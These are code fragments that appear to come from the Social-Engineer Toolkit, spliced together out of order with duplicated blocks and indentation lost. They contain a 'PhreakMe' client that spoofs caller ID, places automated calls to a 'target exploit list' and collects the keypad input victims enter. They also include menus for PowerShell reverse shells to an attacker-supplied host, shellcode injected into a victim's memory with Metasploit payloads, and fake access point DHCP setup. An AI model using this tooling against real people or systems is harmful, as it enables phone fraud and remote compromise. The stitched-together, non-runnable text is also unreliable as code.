def setupMenu(site):
if debug: print ("Setup Menu")
setup_menu = ['Add Target', 'Remove Target', 'List Targets', 'Default Spoofed Number Setting', 'Default Recording Setting', 'Exit Setup Menu']
exit = False
while not exit:
core.create_menu("\r\n==Phreakme Setup Menu==", setup_menu)
setup_menu_choice = (raw_input(setprompt("0", "")))
if setup_menu_choice == "1":
regex = False
while not regex:
new_number = raw_input("Enter a ten digit number to add to the target exploit list: ")
if PHONE.match(new_number):
new_number = str(new_number)
regex = True
post_url = site.url + "/service/setup/targets/" + new_number
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Number not added. Server error code received")
else:
getTargets(site)
elif setup_menu_choice == "2":
regex = False
while not regex:
del_number = raw_input("Enter a ten digit number to remove from the target exploit list: ")
if PHONE.match(del_number):
new_number = str(del_number)
regex = True
del_url = site.url + "/service/setup/targets/" + del_number
request = requests.delete(del_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Number not removed. Server error code received")
else:
getTargets(site)
elif setup_menu_choice == "3":
getTargets(site)
elif setup_menu_choice == "4":
spoofMenu(site)
elif setup_menu_choice == "5":
recordingsMenu(site)
elif setup_menu_choice == "6":
exit = True
def main():
printBanner()
with warnings.catch_warnings():
warnings.simplefilter("ignore")
valid_ip = False
phreak_menu = ['Setup PhreakMe Server URL', 'Setup', 'Exploit', 'Reporting', 'Exit']
site = siteData("")
# site.url = ""
site.auth = False
site.user = ""
site.passwd = ""
site.certverify = False
exit = False
while not exit:
try:
core.create_menu("\r\n==PhreakMe Menu==", phreak_menu)
if not site.url: print_warning (" Make sure to enter a PhreakMe Server URL before selecting other options!")
phreak_menu_choice = (raw_input(setprompt("0", "")))
if phreak_menu_choice == "1":
getURL(site)
elif phreak_menu_choice == "2":
setupMenu(site)
elif phreak_menu_choice == "3":
exploitMenu(site)
elif phreak_menu_choice == "4":
reportingMenu(site)
elif phreak_menu_choice == "5":
exit = True
elif phreak_menu_choice == "hugs":
print_warning("***********************************\r\n")
print_warning("Hugs Are Now Mandatory \o/ \r\n")
print_warning("***********************************\r\n")
elif phreak_menu_choice == "banner":
printBanner()
else:
print_warning ("Did you not get enough hugs as a child? Follow directions and enter a valid selection.\r\n")
except (KeyboardInterrupt):
exit = True
pause=raw_input("\r\n\r\nExiting Phreakme - press [enter] to return to SET main menu")
return
def spoofMenu(site):
if debug: print ("Default Spoofing Number Setup Menu")
setup_menu = ['Set Default Spoofing Number', 'Display Current Spoofing Number', 'Exit Spoofing Number Menu']
exit = False
while not exit:
core.create_menu("\r\n==Default Spoofing Number Setup Menu==", setup_menu)
setup_menu_choice = (raw_input(setprompt("0", "")))
if setup_menu_choice == "1":
spoof_number = None
regex = False
while not regex:
spoof_number = raw_input("Enter a ten digit number to use for spoofed calls: ")
if PHONE.match(spoof_number):
spoof_number = str(spoof_number)
regex = True
spoof_name = None
regex = False
while not regex:
spoof_name = raw_input("Enter a caller name up to 15 chars in case your trunking provider supports setting CNAM (though many don't): ")
pat = re.compile("^[a-zA-Z0-9 ]{1,15}$")
if pat.match(spoof_name):
spoof_name = str(spoof_name)
regex = True
post_url = site.url + "/service/setup/globalcid/" + spoof_number + " <" + spoof_name + ">"
if debug: print ("Sending spoofed number request: " + post_url)
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Default spoofing number not set. Server error code received")
else:
getSpoofedNum(site)
elif setup_menu_choice == "2":
getSpoofedNum(site)
elif setup_menu_choice == "3":
exit = True
def exploitMenu(site):
if debug: print ("Exploit Menu")
exploit_menu = ['Exploit Single Target', 'Exploit All Targets', 'Exit Exploit Menu']
exit = False
while not exit:
core.create_menu("\r\n==Exploit Selection Menu==", exploit_menu)
exploit_menu_choice = (raw_input(setprompt("0", "")))
if exploit_menu_choice == "1":
regex = False
while not regex:
exp_number = raw_input("Enter a ten digit number to exploit: ")
if PHONE.match(exp_number):
exp_number = str(exp_number)
regex = True
regex = False
while not regex:
cid_number = raw_input("Enter a ten digit number to spoof: ")
if PHONE.match(cid_number):
cid_number = str(cid_number)
regex = True
get_url = site.url + "/service/exploit/" + exp_number + "/" + cid_number
request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Exploit command failed. Server error code received")
else:
print ("\r\nMaking the call, please wait a sec... \r\n")
elif exploit_menu_choice == "2":
post_url = site.url + "/service/exploit/all"
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Exploit All command failed. Server error code received")
else:
print ("\r\nMaking the calls, please wait a sec... \r\n")
elif exploit_menu_choice == "3":
exit = True
def recordingsMenu(site):
setup_menu = ['Display Current Recording', 'List Available Recordings', 'Select Default Recording for Calls', 'Exit Recording Menu']
recording = None
exit = False
while not exit:
core.create_menu("\r\n==Recording Setup Menu==", setup_menu)
setup_menu_choice = (raw_input(setprompt("0", "")))
if setup_menu_choice == "1":
recording = currentRecording(site, recording)
if recording:
print("\r\nThe current recording in use for all calls is: " + recording + "\r\n")
else:
print_warning("\r\nThere is no current recording found. Please set one.\r\n")
if setup_menu_choice == "2":
recordingsList(site)
if setup_menu_choice == "3":
selection = None
recordingsList(site)
regex = False
while not selection:
selection = raw_input("Enter the number of the recording you wish to use and hit <Enter>: ")
pat = re.compile("^[1-3]{1}$")
if pat.match(selection):
selection = str(selection)
regex = True
post_url = site.url + "/service/setup/recordings/" + selection
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Default spoofing number not set. Server error code received")
else:
print("Recording selection " + selection + " saved.\r\n")
if setup_menu_choice == "4":
exit = True
import shutil
import subprocess
import src.core.setcore as core
from src.core.menu import text
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
core.debug_msg(core.mod_name(), "printing 'text.powershell menu'", 5)
show_powershell_menu = core.create_menu(text.powershell_text, text.powershell_menu)
powershell_menu_choice = input(core.setprompt(["29"], ""))
if powershell_menu_choice != "99":
# specify ipaddress of reverse listener
#ipaddr = core.grab_ipaddress()
ipaddr = raw_input("Enter the IPAddress or DNS name for the reverse host: ")
core.update_options("IPADDR=" + ipaddr)
# if we select alphanumeric shellcode
if powershell_menu_choice == "1":
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT=" + port)
core.update_options("POWERSHELL_SOLO=ON")
dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.100 192.168.10.254;
option domain-name-servers 8.8.8.8;
option routers 192.168.10.1;
option broadcast-address 192.168.10.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text,
text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"),
"w") as filewrite:
filewrite.write(dhcp_config1)
dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.100 192.168.10.254;
option domain-name-servers 8.8.8.8;
option routers 192.168.10.1;
option broadcast-address 192.168.10.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
def reportingMenu(site):
if debug: print ("Reporting Menu")
reporting_menu = ['Calls With User Input', 'Calls With No User Input Received', 'Archive Call Data', 'Delete Call Data', 'Exit Reporting Menu']
exit = False
while not exit:
core.create_menu("\r\n==Reporting Menu==", reporting_menu)
reporting_menu_choice = (raw_input(setprompt("0", "")))
if reporting_menu_choice == "1":
get_url = site.url + "/service/report"
request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if debug: print(request.text)
if request.status_code != requests.codes.ok:
print_warning("** Report data retrieval failed. Server error code received")
request_json = json.loads(request.text)
if debug: print(request_json)
if len(request_json) > 0:
print("\r\n************************************************")
print("Date and Time Number Dialed User Input")
print("************************************************")
for i in range (0, len(request_json)):
if request_json[i]['Input']:
print(request_json[i]['Created'] + " " + request_json[i]['Dialed'] + " " + request_json[i]['Input'])
print("************************************************\r\n")
else:
print("\r\nNo call data found ...\r\n")
if reporting_menu_choice == "2":
get_url = site.url + "/service/report"
request = requests.get(get_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code != requests.codes.ok:
print_warning("** Report data retrieval failed. Server error code received")
request_json = json.loads(request.text)
if debug: print(request_json)
if len(request_json) > 0:
print("\r\n************************************************")
print("Date and Time Number Dialed")
print("************************************************")
for i in range (0, len(request_json)):
if not request_json[i]['Input']:
print(request_json[i]['Created'] + " " + request_json[i]['Dialed'])
print("************************************************\r\n")
else:
print("\r\nNo call data found ...\r\n")
if reporting_menu_choice == "3":
post_url = site.url + "/service/report/delete"
print_warning("WARNING: This option will archive data on the PhreakMe server. CLI access on the server is required to recover data.")
warning_input = raw_input("Proceed with data archive? (Y/N)[N]: ")
if warning_input.lower() == "y":
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code == requests.codes.ok:
print("** Report data archived")
else:
print("** Report archive failed. Server error code received")
else:
print("\r\nData archive skipped ...\r\n")
if reporting_menu_choice == "4":
post_url = site.url + "/service/report/delete/noarchive"
print_warning("WARNING: This option will permanently DELETE report data on the PhreakMe server.")
warning_input = raw_input("Proceed with data delete? (Y/N)[N]: ")
if warning_input.lower() == "y":
request = requests.post(post_url, auth=HTTPBasicAuth(site.user, site.passwd), verify = site.certverify)
if request.status_code == requests.codes.ok:
print("** Report data deleted")
else:
print("** Report delete failed. Server error code received")
else:
print("\r\nData delete skipped...\r\n")
elif reporting_menu_choice == "5":
exit = True
place it onto a victim machine through hex to binary conversion via powershell.
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
""")
# if we dont detect metasploit
if not os.path.isfile(msf_path):
sys.exit("\n[!] Your no gangster... Metasploit not detected, check set_config.\n")
# if we hit here we are good since msfvenom is installed
###################################################
# USER INPUT: SHOW PAYLOAD MENU 2 #
###################################################
show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2)
payload = (input(core.setprompt(["14"], "")))
if payload == "exit":
core.exit_set()
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
# if we're downloading and executing a file
url = ""
port = ""
After the conversion takes place, Alphanumeric shellcode will then be injected
straight into memory and the stager created and shot back to you.
""")
# if we dont detect metasploit
if not os.path.isfile(msf_path):
sys.exit(
"\n[!] Your no gangster... Metasploit not detected, check set_config.\n"
)
# if we hit here we are good since msfvenom is installed
###################################################
# USER INPUT: SHOW PAYLOAD MENU 2 #
###################################################
show_payload_menu2 = core.create_menu(payload_menu_2_text, payload_menu_2)
payload = (input(core.setprompt(["14"], "")))
if payload == "exit":
core.exit_set()
# if its default then select meterpreter
if payload == "":
payload = "2"
# assign the right payload
payload = ms_payload(payload)
# if we're downloading and executing a file
url = ""
port = ""
